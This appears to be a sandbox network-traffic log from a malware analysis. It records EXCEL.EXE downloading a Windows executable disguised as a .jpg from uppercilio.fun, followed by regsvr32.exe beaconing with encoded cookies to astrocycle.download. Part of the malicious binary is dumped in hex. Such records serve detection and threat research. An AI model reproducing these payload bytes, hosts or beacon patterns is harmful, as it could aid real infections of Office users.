                                                                                                                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02 00 00 00 e0
                                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@.text(8: `.rdata~P>@@.data`@.pdata
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.761375904 CEST65INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                              Data Ascii: @@
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.761393070 CEST67INData Raw: a4 00 00 00 23 02 00 00 8b 05 5a dc 00 00 89 44 24 4c c7 84 24 ac 00 00 00 0b 00 00 00 8b 05 49 dc 00 00 35 89 b4 5a f6 89 05 3e dc 00 00 c7 84 24 a8 00 00 00 17 00 00 00 48 8b 15 78 dc 00 00 8b 05 22 dc 00 00 41 89 c0 48 89 54 24 20 4c 89 c2 41
                                                                                                                                                                                                              Data Ascii: #ZD$L$I5Z>$Hx"AHT$ LA0ALT$ AH<<H$HL$@$G$G$GHHD$0$GD$/$GHD$@L$?${HD$@HHD$@
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.761409044 CEST68INData Raw: 00 00 00 48 8b 49 18 48 89 8c 24 a8 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 8c 01 00 00 48 8b 8c 24 a8 00 00 00 48 8b 49 20 48 89 4c 24 70 0f b7 84 24 b2 00 00 00 89 84 24 88 01 00 00 48 83 7c 24 70 00 0f 84 dc 06 00 00 0f b7 84 24 b2 00 00 00
                                                                                                                                                                                                              Data Ascii: HIH$$$H$HI HL$p$$H|$p$$HL$pHIPHL$h$$HL$pfQHf$$$|HD$`$$xD$/$tHT$`$p$pALD$`D$/$lLD$hA
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.761424065 CEST69INData Raw: f8 00 00 00 8b 44 24 34 83 c8 02 89 44 24 34 c7 84 24 f4 00 00 00 89 b4 5a f6 e9 e5 00 00 00 8b 84 24 84 00 00 00 8b 4c 24 44 81 f1 89 b4 5a f6 39 c8 0f 85 57 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 f0 00 00 00 48 8b 8c 24 a8 00 00 00 48 8b 94
                                                                                                                                                                                                              Data Ascii: D$4D$4$Z$L$DZ9W$$H$H$HH$$D$4D$4$Zp$L$@Z9R$$H$H$HHw$$D$4D$4$
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.761441946 CEST71INData Raw: a0 00 00 00 48 89 b4 24 60 03 00 00 48 8b b4 24 60 03 00 00 89 b4 24 6c 03 00 00 c7 84 24 84 00 00 00 00 00 00 00 8b 84 24 84 00 00 00 3b 84 24 80 00 00 00 0f 83 c4 00 00 00 48 8b 84 24 a0 00 00 00 48 89 84 24 50 03 00 00 48 8b 84 24 50 03 00 00
                                                                                                                                                                                                              Data Ascii: H$`H$`$l$$;$H$H$PH$P$\HL$pHL$xH$H$@H$@$LLD$xILD$xL$L$0L$0D$<LL$pILL$pL$L$ L$ D$,$
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.761464119 CEST72INData Raw: 84 24 a8 00 00 00 41 8b 48 28 41 89 c8 4c 01 c2 48 89 54 24 50 48 8b 54 24 50 48 89 94 24 d0 01 00 00 48 8b 94 24 d0 01 00 00 89 94 24 dc 01 00 00 48 83 7c 24 50 00 0f 84 27 00 00 00 48 8b 44 24 50 48 8b 8c 24 a0 00 00 00 48 8b 15 47 c7 00 00 89
                                                                                                                                                                                                              Data Ascii: $AH(ALHT$PHT$PH$H$$H|$P'HD$PH$HGL$(HDD$(E1H$H$TE1DHD$@HD$@H$H$$H;L$@qH$H$H$$HL$@DLHLHL$
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.761483908 CEST74INData Raw: 00 00 48 8b 4c 24 38 0f b7 41 16 83 e0 01 83 f8 00 0f 84 31 00 00 00 8b 44 24 60 89 84 24 40 01 00 00 c6 44 24 67 00 48 8b 4c 24 68 48 89 8c 24 30 01 00 00 48 8b 8c 24 30 01 00 00 89 8c 24 3c 01 00 00 e9 3d 00 00 00 48 8b 44 24 68 48 89 84 24 20
                                                                                                                                                                                                              Data Ascii: HL$8A1D$`$@D$gHL$hH$0H$0$<=HD$hH$ H$ $,D$gHL$hH$H$$D$`$HD$hH$H$$|$`MD$`$HL$@AD$TD$T$D$TT$`)T$`D$`$
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.761498928 CEST75INData Raw: 24 70 01 00 00 48 8b 84 24 70 01 00 00 89 84 24 7c 01 00 00 48 8b 4c 24 68 8b 01 89 c1 48 03 8c 24 88 00 00 00 48 89 4c 24 58 48 8b 4c 24 58 48 89 8c 24 60 01 00 00 48 8b 8c 24 60 01 00 00 89 8c 24 6c 01 00 00 48 8b 54 24 68 8b 42 10 89 c2 48 03
                                                                                                                                                                                                              Data Ascii: $pH$p$|HL$hH$HL$XHL$XH$`H$`$lHT$hBH$HT$@HT$@H$PH$P$\hH$$LHL$hAH$HL$XHL$XH$@H$@$HHT$XHT$@HT$@H$0H$0$<H$$,
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.761516094 CEST77INData Raw: 89 c1 48 01 c8 48 89 44 24 30 48 8b 44 24 30 48 89 84 24 80 00 00 00 e9 70 00 00 00 48 8b 44 24 68 48 89 84 24 b8 00 00 00 48 8b 84 24 b8 00 00 00 89 84 24 c4 00 00 00 8b 44 24 4c 83 c0 01 89 44 24 4c e9 93 fe ff ff 48 8b 44 24 68 48 89 84 24 a8
                                                                                                                                                                                                              Data Ascii: HHD$0HD$0H$pHD$hH$H$$D$LD$LHD$hH$H$$HD$hH$H$$H$H$HH$LL$`DD$\T$[HL$PD$<HL$PHL$pHL$pL$|HL$PD$+HD$HH
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.763447046 CEST78INData Raw: 00 48 8b 8c 24 a0 00 00 00 89 8c 24 ac 00 00 00 e9 63 ff ff ff 48 8b 44 24 30 48 89 84 24 90 00 00 00 48 8b 84 24 90 00 00 00 89 84 24 9c 00 00 00 48 8b 44 24 50 48 89 84 24 80 00 00 00 48 8b 84 24 80 00 00 00 89 84 24 8c 00 00 00 48 c7 44 24 68
                                                                                                                                                                                                              Data Ascii: H$$cHD$0H$H$$HD$PH$H$$HD$hHD$hHHHT$HL$HD$HD$ HD$ D$,HL$H$H$$HD$H$H$$HL$HHHT$D$HL$H$H$


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                              2192.168.2.2249169104.21.55.8380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.941987991 CEST125OUTGET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                              UA-CPU: AMD64
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                              Host: uppercilio.fun
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Jul 6, 2021 15:34:16.023370028 CEST126INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Tue, 06 Jul 2021 13:34:16 GMT
                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                              Content-Length: 57856
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Content-Disposition: attachment; filename=lsdfik.fml
                                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                              Age: 5884
                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=tdPcIrAE2vvRZYKG1Z8MC4h5F2uk1HO2YqdWJntIaNZoAwTqS6xEVG4oGGJckRbzpb9ReFxkZ%2F6BeyScK5hi57sdBxfviydzcXbmfgwcCsJ5BcBTSQ9zc0B04Gc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 66a935a5daf92c2a-FRA
                                                                                                                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02 00 00 00 e0 00 00 00 00 00 00
                                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@.text(8: `.rdata~P>@@.data`@.pdata
                                                                                                                                                                                                              Jul 6, 2021 15:34:16.023401022 CEST128INData Raw: 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                              Data Ascii: @@
                                                                                                                                                                                                              Jul 6, 2021 15:34:16.023416042 CEST129INData Raw: 00 00 8b 05 5a dc 00 00 89 44 24 4c c7 84 24 ac 00 00 00 0b 00 00 00 8b 05 49 dc 00 00 35 89 b4 5a f6 89 05 3e dc 00 00 c7 84 24 a8 00 00 00 17 00 00 00 48 8b 15 78 dc 00 00 8b 05 22 dc 00 00 41 89 c0 48 89 54 24 20 4c 89 c2 41 b8 00 30 00 00 41
                                                                                                                                                                                                              Data Ascii: ZD$L$I5Z>$Hx"AHT$ LA0ALT$ AH<<H$HL$@$G$G$GHHD$0$GD$/$GHD$@L$?${HD$@HHD$@$
                                                                                                                                                                                                              Jul 6, 2021 15:34:16.023490906 CEST130INData Raw: 18 48 89 8c 24 a8 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 8c 01 00 00 48 8b 8c 24 a8 00 00 00 48 8b 49 20 48 89 4c 24 70 0f b7 84 24 b2 00 00 00 89 84 24 88 01 00 00 48 83 7c 24 70 00 0f 84 dc 06 00 00 0f b7 84 24 b2 00 00 00 89 84 24 84 01 00
                                                                                                                                                                                                              Data Ascii: H$$$H$HI HL$p$$H|$p$$HL$pHIPHL$h$$HL$pfQHf$$$|HD$`$$xD$/$tHT$`$p$pALD$`D$/$lLD$hAaj
                                                                                                                                                                                                              Jul 6, 2021 15:34:16.023514986 CEST132INData Raw: 24 34 83 c8 02 89 44 24 34 c7 84 24 f4 00 00 00 89 b4 5a f6 e9 e5 00 00 00 8b 84 24 84 00 00 00 8b 4c 24 44 81 f1 89 b4 5a f6 39 c8 0f 85 57 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 f0 00 00 00 48 8b 8c 24 a8 00 00 00 48 8b 94 24 a0 00 00 00 8b
                                                                                                                                                                                                              Data Ascii: $4D$4$Z$L$DZ9W$$H$H$HH$$D$4D$4$Zp$L$@Z9R$$H$H$HHw$$D$4D$4$Z
                                                                                                                                                                                                              Jul 6, 2021 15:34:16.023542881 CEST133INData Raw: b4 24 60 03 00 00 48 8b b4 24 60 03 00 00 89 b4 24 6c 03 00 00 c7 84 24 84 00 00 00 00 00 00 00 8b 84 24 84 00 00 00 3b 84 24 80 00 00 00 0f 83 c4 00 00 00 48 8b 84 24 a0 00 00 00 48 89 84 24 50 03 00 00 48 8b 84 24 50 03 00 00 89 84 24 5c 03 00
                                                                                                                                                                                                              Data Ascii: $`H$`$l$$;$H$H$PH$P$\HL$pHL$xH$H$@H$@$LLD$xILD$xL$L$0L$0D$<LL$pILL$pL$L$ L$ D$,$$
                                                                                                                                                                                                              Jul 6, 2021 15:34:16.023562908 CEST134INData Raw: 41 8b 48 28 41 89 c8 4c 01 c2 48 89 54 24 50 48 8b 54 24 50 48 89 94 24 d0 01 00 00 48 8b 94 24 d0 01 00 00 89 94 24 dc 01 00 00 48 83 7c 24 50 00 0f 84 27 00 00 00 48 8b 44 24 50 48 8b 8c 24 a0 00 00 00 48 8b 15 47 c7 00 00 89 4c 24 28 48 89 d1
                                                                                                                                                                                                              Data Ascii: AH(ALHT$PHT$PH$H$$H|$P'HD$PH$HGL$(HDD$(E1H$H$TE1DHD$@HD$@H$H$$H;L$@qH$H$H$$HL$@DLHLHL$ LLT
                                                                                                                                                                                                              Jul 6, 2021 15:34:16.023581982 CEST136INData Raw: 38 0f b7 41 16 83 e0 01 83 f8 00 0f 84 31 00 00 00 8b 44 24 60 89 84 24 40 01 00 00 c6 44 24 67 00 48 8b 4c 24 68 48 89 8c 24 30 01 00 00 48 8b 8c 24 30 01 00 00 89 8c 24 3c 01 00 00 e9 3d 00 00 00 48 8b 44 24 68 48 89 84 24 20 01 00 00 48 8b 84
                                                                                                                                                                                                              Data Ascii: 8A1D$`$@D$gHL$hH$0H$0$<=HD$hH$ H$ $,D$gHL$hH$H$$D$`$HD$hH$H$$|$`MD$`$HL$@AD$TD$T$D$TT$`)T$`D$`$D
                                                                                                                                                                                                              Jul 6, 2021 15:34:16.023605108 CEST137INData Raw: 8b 84 24 70 01 00 00 89 84 24 7c 01 00 00 48 8b 4c 24 68 8b 01 89 c1 48 03 8c 24 88 00 00 00 48 89 4c 24 58 48 8b 4c 24 58 48 89 8c 24 60 01 00 00 48 8b 8c 24 60 01 00 00 89 8c 24 6c 01 00 00 48 8b 54 24 68 8b 42 10 89 c2 48 03 94 24 88 00 00 00
                                                                                                                                                                                                              Data Ascii: $p$|HL$hH$HL$XHL$XH$`H$`$lHT$hBH$HT$@HT$@H$PH$P$\hH$$LHL$hAH$HL$XHL$XH$@H$@$HHT$XHT$@HT$@H$0H$0$<H$$,HD$
                                                                                                                                                                                                              Jul 6, 2021 15:34:16.023626089 CEST139INData Raw: 89 44 24 30 48 8b 44 24 30 48 89 84 24 80 00 00 00 e9 70 00 00 00 48 8b 44 24 68 48 89 84 24 b8 00 00 00 48 8b 84 24 b8 00 00 00 89 84 24 c4 00 00 00 8b 44 24 4c 83 c0 01 89 44 24 4c e9 93 fe ff ff 48 8b 44 24 68 48 89 84 24 a8 00 00 00 48 8b 84
                                                                                                                                                                                                              Data Ascii: D$0HD$0H$pHD$hH$H$$D$LD$LHD$hH$H$$HD$hH$H$$H$H$HH$LL$`DD$\T$[HL$PD$<HL$PHL$pHL$pL$|HL$PD$+HD$HHD$PH
                                                                                                                                                                                                              Jul 6, 2021 15:34:16.023825884 CEST140INData Raw: 00 00 00 89 8c 24 ac 00 00 00 e9 63 ff ff ff 48 8b 44 24 30 48 89 84 24 90 00 00 00 48 8b 84 24 90 00 00 00 89 84 24 9c 00 00 00 48 8b 44 24 50 48 89 84 24 80 00 00 00 48 8b 84 24 80 00 00 00 89 84 24 8c 00 00 00 48 c7 44 24 68 00 00 00 00 48 8b
                                                                                                                                                                                                              Data Ascii: $cHD$0H$H$$HD$PH$H$$HD$hHD$hHHHT$HL$HD$HD$ HD$ D$,HL$H$H$$HD$H$H$$HL$HHHT$D$HL$H$H$$


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                              3192.168.2.2249171172.67.213.11580C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                              Jul 6, 2021 15:34:19.246521950 CEST445OUTGET / HTTP/1.1
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Cookie: __gads=3565085024:1:5201:46; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=383133383438:416C627573:31303745413343414446434341313538; __io=0; _gid=67AFEDC5AC03
                                                                                                                                                                                                              Host: astrocycle.download
                                                                                                                                                                                                              Jul 6, 2021 15:34:19.831310987 CEST446INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Tue, 06 Jul 2021 13:34:19 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=V0ys7aYdAOjPlkJGrObNQ2tiQGLMnmitDVcOVn5a040LrNhwCvTf3xr2iKIXbxukcjSBigbt3O5XMd7BfJvv2cNF6mg2WXaP2PByGtiV8voZj8c0%2FeqFYxeWaum3sBcuGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 66a935ba7ccc4a61-FRA
                                                                                                                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                              Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                              Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
                                                                                                                                                                                                              Jul 6, 2021 15:34:19.831341028 CEST446INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                              4192.168.2.2249173172.67.213.11580C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                              Jul 6, 2021 15:34:22.977318048 CEST705OUTGET / HTTP/1.1
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Cookie: __gads=3565085024:1:5205:46; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=383133383438:416C627573:44384136334637384333384532304645; __io=0; _gid=67AFEDC5AC03
                                                                                                                                                                                                              Host: astrocycle.download
                                                                                                                                                                                                              Jul 6, 2021 15:34:23.747246027 CEST706INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Tue, 06 Jul 2021 13:34:23 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=HMU1z98qz%2BVQF9KOT3FaPvckp0uHUcptWSVHzhJ9y8FG6E5%2B61fqsLq6V%2BHS0LC%2Fk%2BFVuat9dnfvR3w7v8U%2Fg44%2Bht89lsSbZgT4Rayl%2FrsuOF2ItkhiwAZzr9Rse6841g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 66a935d1db51dffb-FRA
                                                                                                                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                              Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                              Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
                                                                                                                                                                                                              Jul 6, 2021 15:34:23.747273922 CEST706INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                              5192.168.2.2249175172.67.213.11580C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                              Jul 6, 2021 15:34:26.702739000 CEST964OUTGET / HTTP/1.1
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Cookie: __gads=3565085024:1:5209:47; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=383133383438:416C627573:32324339344139363335433034463745; __io=0; _gid=67AFEDC5AC03
                                                                                                                                                                                                              Host: astrocycle.download
                                                                                                                                                                                                              Jul 6, 2021 15:34:27.475414038 CEST965INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Tue, 06 Jul 2021 13:34:27 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=hbLm0fCkek782JLvUEF98E3orjhlZE7DgZvQLOikvpFFdnj1BgJEcdInP4X56B1O7cbHwW3Db8JcUauUiKGjIo3axkyhxQHzY5u0DeKM97TV7Ps1mcUjprh3RKNQ2X9%2Bhw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 66a935e91a132b71-FRA
